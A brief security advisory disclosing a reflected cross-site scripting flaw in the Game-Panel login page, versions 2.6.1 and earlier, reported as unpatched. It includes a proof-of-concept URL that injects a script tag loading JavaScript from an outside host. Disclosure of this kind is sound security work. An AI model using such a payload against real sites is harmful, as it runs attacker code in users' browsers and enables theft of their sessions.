ORIGIONAL SOURCE: http://notlegal.ws/gamepanel.txt summary software: Game-Panel vendors website: http://game-panel.com versions: <= 2.6.1 class: remote status: unpatched exploit: available solution: not available discovered by: sycko risk level: medium description game-panel uses a global variable to print out error messages on their login page allowing execution of javascript exploit(s) http://example.com/login.php?message=%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E credit author(s): retard, jim, and sycko email: retard@xxxxxxxxxx
